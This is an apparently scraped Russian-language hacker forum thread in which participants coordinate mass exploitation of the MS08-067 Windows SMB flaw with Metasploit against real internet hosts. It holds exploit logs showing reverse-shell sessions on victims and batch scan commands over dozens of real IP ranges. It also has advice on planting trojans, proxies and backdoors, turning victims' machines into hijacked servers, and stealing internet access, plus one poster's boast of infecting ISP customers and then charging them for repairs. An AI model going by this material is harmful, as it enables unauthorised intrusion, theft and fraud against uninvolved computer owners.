вот вот я тоже не понял сути вопроса , ну бывает обычно что зашёл через радмина , а комп залочен , но так как уже допустим учётка создана через cmd (режим Telnet )
то просто нажимаешь Ctrl+Alt+F12 и вбиваешь свой логин и пасс и прекрасно входишь !Это тоже не всегда срабатывает: жмешь на учетку, а оно ваще выкидывает из радмина. И потом телнет и передача файлов- можно, а управление не работает! У меня как-то было несколько вьетнамских РАдминов из одной подсети и у всех так было, я просто забил на них, да и айпи у них походу динамические были.

17:29:01 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
17:29:03 - ms08_067_netapi Started reverse handler
17:29:13 - ms08_067_netapi Automatically detecting the target...
17:29:27 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
17:29:27 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
17:29:28 - ms08_067_netapi Triggering the vulnerability...

блин нифига не катит, чёто тоже, тс, напиши мне в лс какой нить ип, я попробую :(

фаервол бло4ит или антивирус=\

фаервол бло4ит или антивирус=\
блин так уже штук 40 :mad:

ловите диапазончики)

ipscan.exe 62.16.0.0 62.16.31.255 1.txt
ipscan.exe 62.32.63.232 62.32.63.239 2.txt
ipscan.exe 62.32.63.248 62.32.63.255 3.txt
ipscan.exe 62.64.64.0 62.64.127.255 4.txt
ipscan.exe 62.72.160.0 62.72.191.255 5.txt
ipscan.exe 62.80.160.0 62.80.191.255 6.txt
ipscan.exe 62.149.0.0 62.149.31.255 7.txt
ipscan.exe 62.182.80.0 62.182.87.255 8.txt
ipscan.exe 62.182.120.0 62.182.127.255 9.txt
ipscan.exe 62.182.152.0 62.182.167.255 10.txt
ipscan.exe 62.187.208.0 62.187.208.7 11.txt
ipscan.exe 62.205.128.0 62.205.159.255 12.txt
ipscan.exe 62.221.32.0 62.221.63.255 13.txt
ipscan.exe 62.244.0.0 62.244.63.255 14.txt
ipscan.exe 77.47.128.0 77.47.255.255 15.txt
ipscan.exe 77.52.0.0 77.52.255.255 16.txt
ipscan.exe 77.75.144.0 77.75.151.255 17.txt
ipscan.exe 77.87.32.0 77.87.39.255 18.txt
ipscan.exe 77.87.80.0 77.87.87.255 19.txt
ipscan.exe 77.87.144.0 77.87.159.255 20.txt
ipscan.exe 77.87.192.0 77.87.199.255 21.txt
ipscan.exe 77.88.192.0 77.88.255.255 22.txt
ipscan.exe 77.90.192.0 77.90.255.255 23.txt
ipscan.exe 77.91.128.0 77.91.191.255 24.txt
ipscan.exe 77.93.32.0 77.93.63.255 25.txt
ipscan.exe 77.109.0.0 77.109.63.255 26.txt
ipscan.exe 77.120.0.0 77.123.255.255 27.txt
ipscan.exe 77.222.128.0 77.222.159.255 28.txt
ipscan.exe 77.239.160.0 77.239.191.255 29.txt
ipscan.exe 77.242.160.0 77.242.175.255 30.txt
ipscan.exe 77.244.32.0 77.244.47.255 31.txt
ipscan.exe 77.247.16.0 77.247.31.255 32.txt
ipscan.exe 77.247.216.0 77.247.223.255 33.txt
ipscan.exe 78.24.72.0 78.24.79.255 34.txt
ipscan.exe 78.25.0.0 78.25.63.255 35.txt
ipscan.exe 78.26.128.0 78.26.255.255 36.txt
ipscan.exe 78.27.128.0 78.27.255.255 37.txt
ipscan.exe 78.30.192.0 78.30.255.255 38.txt
ipscan.exe 78.31.176.0 78.31.207.255 39.txt
ipscan.exe 78.31.232.0 78.31.239.255 40.txt
ipscan.exe 78.31.248.0 78.31.255.255 41.txt
ipscan.exe 78.109.16.0 78.109.16.23 42.txt
ipscan.exe 78.109.16.32 78.109.16.207 43.txt
ipscan.exe 78.109.16.216 78.109.16.223 44.txt
ipscan.exe 78.109.16.232 78.109.17.0 45.txt
ipscan.exe 78.109.17.8 78.109.17.95 46.txt
ipscan.exe 78.109.17.104 78.109.18.95 47.txt
ipscan.exe 78.109.18.112 78.109.18.127 48.txt
ipscan.exe 78.109.18.136 78.109.18.223 49.txt
ipscan.exe 78.109.18.232 78.109.19.87 50.txt
ipscan.exe 78.109.19.96 78.109.19.111 51.txt
ipscan.exe 78.109.19.128 78.109.20.23 52.txt
ipscan.exe 78.109.20.32 78.109.21.111 53.txt
ipscan.exe 78.109.21.120 78.109.21.167 54.txt
ipscan.exe 78.109.21.176 78.109.21.223 55.txt
ipscan.exe 78.109.21.232 78.109.22.3 56.txt
ipscan.exe 78.109.22.8 78.109.22.31 57.txt
ipscan.exe 78.109.22.40 78.109.22.47 58.txt
ipscan.exe 78.109.22.56 78.109.22.251 59.txt
ipscan.exe 78.109.23.0 78.109.23.143 60.txt
ipscan.exe 78.109.23.152 78.109.23.159 61.txt
ipscan.exe 78.109.23.168 78.109.24.47 62.txt
засовуем в батник в папке с айписканом и ждём пару часиков)
там дофига с открытым портом,сам просто необработаю такое кол-во открытых портов...
диап русский,пинг отличный ,удачи)

Короч почти всё получается
Кто не может найти ip для скана
Вот тут http://www.domaintools.com/reverse-ip/explorer.html?ip=0.0.0.0 можно просмотреть загруженность того или иного диапозона
И выбрать себе подходящий для скана
а не просто сканить мёртвые ip

Я так понял если язык винды жертвы не рус или инглиш - То выдаёт ошибку языка
Или всё дело в оси которая сканиться (сервер или не win)

04:47:32 - ms08_067_netapi Fingerprint: Unix Samba 3.0.24 - lang:Unknown
04:47:32 - ms08_067_netapi Could not determine the exact language pack

04:42:09 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
04:42:09 - ms08_067_netapi Could not determine the exact language pack

Кто может обьяcнить почему происходит дисконект от железа откуда уже получен шел
Вот пример лога:
Ip потёр
14:38:29 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
14:38:30 - ms08_067_netapi Started reverse handler
14:38:31 - ms08_067_netapi Automatically detecting the target...
14:38:33 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
14:38:33 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
14:38:34 - ms08_067_netapi Triggering the vulnerability...
14:38:34 - Session 3 created for xxx.xxx.125.7:1091
14:38:41 - Session 3 closed for xxx.xxx.125.7:1091

Разрыв происходит после того как я пытаюсь врубить консоль через область Sessions
Или после ввода команды через консоль метасплоита
Как я понял - это антивирь или экран брандмауэр блочит на удалённом компьютере
Или я ошибаюсь?
После этого подключенние не делается

Пока это писал проверил ещё раз подключиться
И о чудо - коннект
[Через пару минут]
Бл*дь уже 9-ое соединение пробую на один и тот же айпи
И всегда после получения шела и попытки вызова консоли - Session closed
И что я заметил - при каждом следующей сесии числа после ip меняються
Вот пример:
14:45:41 - Session 4 created for xxx.xxx.125.7:1093
14:47:09 - Session 5 created for xxx.xxx.125.7:1094
14:47:27 - Session 6 created for xxx.xxx.125.7:1095
14:47:50 - Session 7 created for xxx.xxx.125.7:1097
14:48:07 - Session 8 created for xxx.xxx.125.7:1099

И они идут по нарастающей
Обьясните что это значит
Ведь конект происходит через 445 порт

Одно дело порт уязвимого сервиса а другое пайп с cmd (т.е. реверсшелл)- вот он как раз использует свой порт и это соединение может рубить фаейр на компе жерты, если он жёстко настроен на фильтрацию исходящих соединений. У тебя как раз проблема с этим. Т.е. соединение разрывается либо чем-то либо кем-то. ;)

Посвящается тем у кого туго с диапазонами
Кому нужны IP зарезервированные для Российской Федерации
Пишите в личку
Кому это поможет - от репы не откажусь :-)
Диапазонов много
Нужны для какой нибудь другой страны - пишите
Постараюсь помочь

Да, все нормально работает, но только в своей домашней сети (из 100 примерно 40 с открытыми портами и где то 10-15 пускают к себе). Как пробую сканировать диапазоны других стран, так ничего не ловится...хм неужели из 10 тысяч компов в онлайне ни одного с 445 открытым ? :confused: Все 49 страниц прочитал...

Да, все нормально работает, но только в своей домашней сети (из 100 примерно 40 с открытыми портами и где то 10-15 пускают к себе). Как пробую сканировать диапазоны других стран, так ничего не ловится...хм неужели из 10 тысяч компов в онлайне ни одного с 445 открытым ? :confused: Все 49 страниц прочитал...
Мне тоже так сначало казалось
Потом попробовал раз-два..........сорок пятый, сорок шестой раз.......
Сейчас попадаются "зелёненькие железяки"
Сначало я тож пробовал пользователей нашего прова
Но там я так - пару батников закину - запушу и наутёк (а там такое потом твориться)
Заодно и клиенты появляються - звонят говорят чо такое не грузиться, виснит, и всё плохо что-то стало
Я к ним починить - а мне денюшку :-)
[если что, это я вам так, по секрету тсссссссссс - никому :-) ]

Я к ним починить - а мне денюшку :-)

Это конечно же прикольно :-)

Вот еще вопрос у меня появился, когда у меня открывается цмд на компе , то на удаленном тоже чтоли ?

Я ввел tasklist и...о, боже ! Там цмд в списке...походу меня запалили, хорошо что я лил не со своего фтп а с левого в инете(полный доступ). И потом удаленный комп ушел в ребут или хз...

Всем привет !!! Вот почитал статейку и попробывал и снял видео кому интересно и не понятно смотрите.http://files.mail.ru/GI09CV

Мне тоже так сначало казалось
Потом попробовал раз-два..........сорок пятый, сорок шестой раз.......
Сейчас попадаются "зелёненькие железяки"
Сначало я тож пробовал пользователей нашего прова
Но там я так - пару батников закину - запушу и наутёк (а там такое потом твориться)
Заодно и клиенты появляються - звонят говорят чо такое не грузиться, виснит, и всё плохо что-то стало
Я к ним починить - а мне денюшку :-)
[если что, это я вам так, по секрету тсссссссссс - никому :-) ]Весело:)
Посвящается тем у кого туго с диапазонами
Кому нужны IP зарезервированные для Российской Федерации
Пишите в личку
Кому это поможет - от репы не откажусь :-)
Диапазонов много
Нужны для какой нибудь другой страны - пишите
Постараюсь помочь
Них себе услуга:) ее уже до тебя оказывали и продолжают на http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
Это конечно же прикольно :-)

Вот еще вопрос у меня появился, когда у меня открывается цмд на компе , то на удаленном тоже чтоли ?

Я ввел tasklist и...о, боже ! Там цмд в списке...походу меня запалили, хорошо что я лил не со своего фтп а с левого в инете(полный доступ). И потом удаленный комп ушел в ребут или хз...Поидее палить не должно

Всем привет !!! Вот почитал статейку и попробывал и снял видео кому интересно и не понятно смотрите.http://files.mail.ru/GI09CV

Нормально, только потом ты почему то перестал комментировать свои действия :) Ну и айпишники вроде сетевые ? А в инете как дела обстоят ?

Поидее палить не должно

Вот как до даже стремно теперь :D

Комментировать задолбался,да ip сетевые найду инетовские запишу ролик,а потом выложу.

хы, а я какраз эту тему вчера искал :)
Нащёл 6 дедиков ни на одном не прокатило =\ Дырка старая по ходу и не актуальная

диапы на которых водятся живые кампы с откр портами (отобраны населяемые)
Scanned 195.114.32.0 - 195.114.63.255 (Ports: 445)
Scanned 195.122.0.0 - 195.122.31.255 (Ports: 445)
Scanned 195.13.128.0 - 195.13.255.255 (Ports: 445)
Scanned 195.8.115.0 - 195.8.115.255 (Ports: 445)
Scanned 194.19.224.0 - 194.19.255.255 (Ports: 445)
Scanned 193.238.212.0 - 193.238.223.255 (Ports: 445)
Scanned 91.135.16.0 - 91.135.31.255 (Ports: 445)
дабы воздух вы не сканили тут много открытых портов... колупайте :)
P.S отличное видео обучающее,взлом на примере :)
http://hack-help.us/loads/down/Obuchajyschie_video/_________.rar
для скана диапов юзайте отличную прогу
http://hack-help.us/loads/down/Hakerskij_soft/Vzlom_serverov/Skanery_portov/pt-check-09-001-ru.zip
способ рульный,я се так халявный инет добыл так что добрый терь ^_^
Совет: сканьте локалку :)
Какие нить ламеры полюбэ не обновили систему :)
Двоих зайцев убиваем,получаем доступ к локальному кампу- получаем халявный инет - ставим проксю или трояним),получаем дедик,получаем камп с кучей бекдоров )
ну дырка и не актуальна но всегда будут юзеры которые не обновляются ;)

Scanned 195.114.32.0 - 195.114.63.255 (Ports: 445)
Scanned 195.122.0.0 - 195.122.31.255 (Ports: 445)
Scanned 195.13.128.0 - 195.13.255.255 (Ports: 445)
Scanned 195.8.115.0 - 195.8.115.255 (Ports: 445)
Scanned 194.19.224.0 - 194.19.255.255 (Ports: 445)
Scanned 193.238.212.0 - 193.238.223.255 (Ports: 445)
Scanned 91.135.16.0 - 91.135.31.255 (Ports: 445)

Посканил я твои диапы, ничего не нашел...вероятно у нас пров что то мутит...или же мне нужен внешний ип. Пробовал через халявный впн сидеть , но впн оказался только для серфинга, так что облом...

Какие нить ламеры полюбэ не обновили систему
Двоих зайцев убиваем,получаем доступ к локальному кампу- получаем халявный инет - ставим проксю или трояним),получаем дедик,получаем камп с кучей бекдоров )

Да я зацепил у себя в сети, ну а толку то...нужен то дедик, а не комп с юзером на борту, ну только если для халявного инета...

Посканил я твои диапы, ничего не нашел....
открытых портов ненашёл или с уязвой?
Ща просканил порты есть ;)
насчёт дыр хз


Да я зацепил у себя в сети, ну а толку то...нужен то дедик, а не комп с юзером на борту, ну только если для халявного инета...
Каждый использует полученные знания по своему усмотрению и объёму которые ему нужны...
Мне дедик особенно ненужен да и не факт что много администраторов которые не обновляются...
Ну а халявный инет пожалуй актуально для мну ибо он у мну стоит дороговастенько =(
Надеюсь что кому-то помогу :) так сказать в хак тиму "помощи" таки вхожу :cool:

Здравствуйте!
Помогите плз, ....вот я имею доступ к машине жертвы , через радмин , а как сделать его машину дедиком? ....просто напишите мне плз ...какую команду надо писать в его командной строке чтобы запустить терминал екзе. И если можно, ответь плиз в асю 520316 .Хелп плз, извините за тупой вопрос.

Здравствуйте!
Помогите плз, ....вот я имею доступ к машине жертвы , через радмин , а как сделать его машину дедиком? ....просто напишите мне плз ...какую команду надо писать в его командной строке чтобы запустить терминал екзе. И если можно, ответь плиз в асю 520316 .Хелп плз, извините за тупой вопрос.


читать ещё раз , до полного просветления !

http://stopxaker.ru/showthread.php?t=21

http://forum.antichat.ru/showpost.php?p=1037757&postcount=1

Здравствуйте!
Помогите плз, ....вот я имею доступ к машине жертвы , через радмин , а как сделать его машину дедиком? ....просто напишите мне плз ...какую команду надо писать в его командной строке чтобы запустить терминал екзе. И если можно, ответь плиз в асю 520316 .Хелп плз, извините за тупой вопрос.

Кидаешь ему terminal.exe куда либо, и потом запускаешь из радмина, ну или через командную строку чтобы без палева.
============================

Всем спасибо...дошло все, получилось) кулл+)